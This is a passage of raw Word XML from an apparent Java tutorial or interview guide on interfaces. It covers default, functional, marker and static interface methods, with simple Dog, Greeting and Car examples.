      </w:r>
    </w:p>
    <w:p w14:paraId="7A9CE00C"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6F4C2657"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sound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5767CCB8"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The dog barks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44258516"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E6F7974"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5933686"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You can also override the default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F955C"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7431CCBA"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sleep() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587E166"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The dog sleeps peacefully");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DEDA33"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865AFB1"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011F8FC" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C89B3A9"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29BE4B9D"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04678B1F"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og dog = new Dog();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1350E9E0"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og.sound();   // Output: The dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2228E00A"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og.sleep();   // Output: The dog sleeps peacefully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152792D0"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A37EB5D"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E4D124C" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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0B38755">
          <v:rect id="_x0000_i1379" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC3BA56" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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Points of the Above Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D04F15" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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terface Declaration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Animal interface has one abstract method (sound()) and a default method (sleep()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76AA4C" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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mplementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Dog class implements the Animal interface and provides implementations for the abstract method sound() and overrides the default method sleep().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570255D" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ing Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Dog object invokes the methods sound() and sleep(), showing how both abstract and default methods work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A562F16" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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p w14:paraId="475931B7"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dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D50156"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dog sleeps peacefully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA1217F" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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5B76F0">
          <v:rect id="_x0000_i1380" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="098EFC80" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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y Use Interfaces?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D797B8A" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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bstraction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interfaces help in defining a contract of what methods a class should implement, without defining how these methods should be implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48852A15" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ultiple Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In Java, a class can implement multiple interfaces, thus allowing it to inherit behavior from multiple sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC5660"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697A662E"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sound();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AEF397"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DC3AB84" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4697C19E"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Walker {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EB9BFF"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walk();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC580F"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55B09CB" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2093A27D"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Dog implements Animal, Walker {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD64E8"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sound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A50DC6"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Barks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E1137"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5B72BDF" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1AC906"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walk() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219EE22B"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Walks on 4 legs");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6757502E"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BABD645"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A47DB93" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ose Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Interfaces allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loose coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between different parts of the program. A class can work with any implementation of an interface without needing to know the exact class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF6D52" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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9EE8B5E">
          <v:rect id="_x0000_i1381" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1B13D" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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Types of Interfaces in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528951D1" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63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arker Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An interface with no methods or fields, used to indicate a special property or behavior for a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914A4E6" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63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Serializable interface is a marker interface used to indicate that a class can be serialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280713ED" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: An interface with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. These are used primarily with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294350E" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63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Runnable, Callable, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC41846"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE42C7D"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Greeting {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8BA95F"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greet(String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEDAC48"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7F708EB" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1DF324"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070588C5"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7A5C9520"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Greeting greet = (name) -&gt; System.out.println("Hello, " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD1E93B"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greet.greet("John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BED58F9"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B7B0872"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9FFDBE6" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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653A46">
          <v:rect id="_x0000_i1382" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A3E244" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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eal-World Analogy for Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652C3121" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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ink of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contract</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agreement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that dictates what actions can be performed, but doesn't specify how those actions should be performed. For instance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65A484" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Car</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface might define methods like start(), stop(), and accelerate(). Any class (like Sedan, SUV, etc.) that implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Car</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface will provide the specific implementation for these actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35653A83" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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9796593">
          <v:rect id="_x0000_i1383" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0782966D" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428C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Advantages of Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D1771D" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63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ose Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interfaces allow for flexible, loosely coupled code that can evolve without breaking other parts of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3711E" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63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coupling Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interfaces allow you to decouple the code from specific implementations and provide more reusable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA78715" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63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ultiple Implementations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can implement multiple interfaces in a single class, providing a form of multiple inheritance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CE78A7" w14:textId="32AD5659" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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4333BB83">
          <v:rect id="_x0000_i1384" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B35C2E7" w14:textId="77777777" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc196307607"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we have a static method inside the interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="55C383AD" w14:textId="3D2CB41F" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="003428CE" w:rsidP="004266AA">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Y</w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">es, </w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static methods</w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are allowed inside interfaces in Java, starting from </w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. A static method in an interface is associated with the interface itself, not with any instance of a class that implements the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F682D" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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Points About Static Methods in Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266C6881" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in an interface cannot be overridden by the implementing classes. They belong to the interface itself, not the implementing class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F1F4C2" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ing Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You access static methods in an interface using the interface name (not through an object instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08476C6E" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ault Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods are different from default methods. Static methods are called on the interface itself, whereas default methods can be called on objects of the implementing class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717630C" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004266A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E45996">
          <v:rect id="_x0000_i1385" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F87D9" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266A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yntax for Static Method in Interface:</w:t>
      </w:r>
    </w:p>
